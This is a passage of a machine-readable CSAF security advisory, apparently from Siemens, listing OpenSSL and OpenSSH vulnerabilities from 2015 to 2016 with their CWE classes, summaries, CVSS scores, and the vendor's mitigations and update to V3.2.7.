"CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-3193" }, { "cve": "CVE-2015-3194", "cwe": { "id": "CWE-476", "name": "NULL Pointer Dereference" }, "notes": [ { "category": "summary", "text": "crypto/rsa/rsa_ameth.c in OpenSSL 1.0.1 before 1.0.1q and 1.0.2 before 1.0.2e allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an RSA PSS ASN.1 signature that lacks a mask generation function parameter.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-3194" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-3194" }, { "cve": "CVE-2015-3195", "cwe": { "id": "CWE-200", "name": "Exposure of Sensitive Information to an Unauthorized Actor" }, "notes": [ { "category": "summary", "text": "The ASN1_TFLG_COMBINE implementation in crypto/asn1/tasn_dec.c in OpenSSL before 0.9.8zh, 1.0.0 before 1.0.0t, 1.0.1 before 1.0.1q, and 1.0.2 before 1.0.2e mishandles errors caused by malformed X509_ATTRIBUTE data, which allows remote attackers to obtain sensitive information from process memory by triggering a decoding failure in a PKCS#7 or CMS application.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-3195" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.3, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-3195" }, { "cve": "CVE-2015-3196", "cwe": { "id": "CWE-362", "name": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)" }, "notes": [ { "category": "summary", "text": "ssl/s3_clnt.c in OpenSSL 1.0.0 before 1.0.0t, 1.0.1 before 1.0.1p, and 1.0.2 before 1.0.2d, when used for a multi-threaded client, writes the PSK identity hint to an incorrect data structure, which allows remote servers to cause a denial of service (race condition and double free) via a crafted ServerKeyExchange message.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-3196" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.3, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-3196" }, { "cve": "CVE-2015-3197", "cwe": { "id": "CWE-200", "name": "Exposure of Sensitive Information to an Unauthorized Actor" }, "notes": [ { "category": "summary", "text": "ssl/s2_srvr.c in OpenSSL 1.0.1 before 1.0.1r and 1.0.2 before 1.0.2f does not prevent use of disabled ciphers, which makes it easier for man-in-the-middle attackers to defeat cryptographic protection mechanisms by performing computations on SSLv2 traffic, related to the get_client_master_key and get_client_hello functions.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-3197" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.9, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-3197" }, { "cve": "CVE-2015-4000", "cwe": { "id": "CWE-327", "name": "Use of a Broken or Risky Cryptographic Algorithm" }, "notes": [ { "category": "summary", "text": "The TLS protocol 1.2 and earlier, when a DHE_EXPORT ciphersuite is enabled on a server but not on a client, does not properly convey a DHE_EXPORT choice, which allows man-in-the-middle attackers to conduct cipher-downgrade attacks by rewriting a ClientHello with DHE replaced by DHE_EXPORT and then rewriting a ServerHello with DHE_EXPORT replaced by DHE, aka the \"Logjam\" issue.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-4000" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 3.7, "baseSeverity": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-4000" }, { "cve": "CVE-2015-5352", "cwe": { "id": "CWE-829", "name": "Inclusion of Functionality from Untrusted Control Sphere" }, "notes": [ { "category": "summary", "text": "The x11_open_helper function in channels.c in ssh in OpenSSH before 6.9, when ForwardX11Trusted mode is not used, lacks a check of the refusal deadline for X connections, which makes it easier for remote attackers to bypass intended access restrictions via a connection outside of the permitted time window.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-5352" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.3, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-5352" }, { "cve": "CVE-2015-5600", "cwe": { "id": "CWE-799", "name": "Improper Control of Interaction Frequency" }, "notes": [ { "category": "summary", "text": "The kbdint_next_device function in auth2-chall.c in sshd in OpenSSH through 6.9 does not properly restrict the processing of keyboard-interactive devices within a single connection, which makes it easier for remote attackers to conduct brute-force attacks or cause a denial of service (CPU consumption) via a long and duplicative list in the ssh -oKbdInteractiveDevices option, as demonstrated by a modified client that provides a different password for each pam element on this list.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-5600" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 8.2, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-5600" }, { "cve": "CVE-2015-6563", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "notes": [ { "category": "summary", "text": "The monitor component in sshd in OpenSSH before 7.0 on non-OpenBSD platforms accepts extraneous username data in MONITOR_REQ_PAM_INIT_CTX requests, which allows local users to conduct impersonation attacks by leveraging any SSH login access in conjunction with control of the sshd uid to send a crafted MONITOR_REQ_PWNAM request, related to monitor.c and monitor_wrap.c.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-6563" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 2.9, "baseSeverity": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-6563" }, { "cve": "CVE-2015-6564", "cwe": { "id": "CWE-416", "name": "Use After Free" }, "notes": [ { "category": "summary", "text": "Use-after-free vulnerability in the mm_answer_pam_free_ctx function in monitor.c in sshd in OpenSSH before 7.0 on non-OpenBSD platforms might allow local users to gain privileges by leveraging control of the sshd uid to send an unexpectedly early MONITOR_REQ_PAM_FREE_CTX request.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-6564" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.4, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-6564" }, { "cve": "CVE-2015-6565", "cwe": { "id": "CWE-284", "name": "Improper Access Control" }, "notes": [ { "category": "summary", "text": "sshd in OpenSSH 6.8 and 6.9 uses world-writable permissions for TTY devices, which allows local users to cause a denial of service (terminal disruption) or possibly have unspecified other impact by writing to a device, as demonstrated by writing an escape sequence.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-6565" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 8.4, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-6565" }, { "cve": "CVE-2015-8325", "cwe": { "id": "CWE-426", "name": "Untrusted Search Path" }, "notes": [ { "category": "summary", "text": "The do_setup_env function in session.c in sshd in OpenSSH through 7.2p2, when the UseLogin feature is enabled and PAM is configured to read .pam_environment files in user home directories, allows local users to gain privileges by triggering a crafted environment for the /bin/login program, as demonstrated by an LD_PRELOAD environment variable.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-8325" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.8, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-8325" }, { "cve": "CVE-2016-0701", "cwe": { "id": "CWE-200", "name": "Exposure of Sensitive Information to an Unauthorized Actor" }, "notes": [ { "category": "summary", "text": "The DH_check_pub_key function in crypto/dh/dh_check.c in OpenSSL 1.0.2 before 1.0.2f does not ensure that prime numbers are appropriate for Diffie-Hellman (DH) key exchange, which makes it easier for remote attackers to discover a private DH exponent by making multiple handshakes with a peer that chose an inappropriate number, as demonstrated by a number in an X9.42 file.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-0701" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens 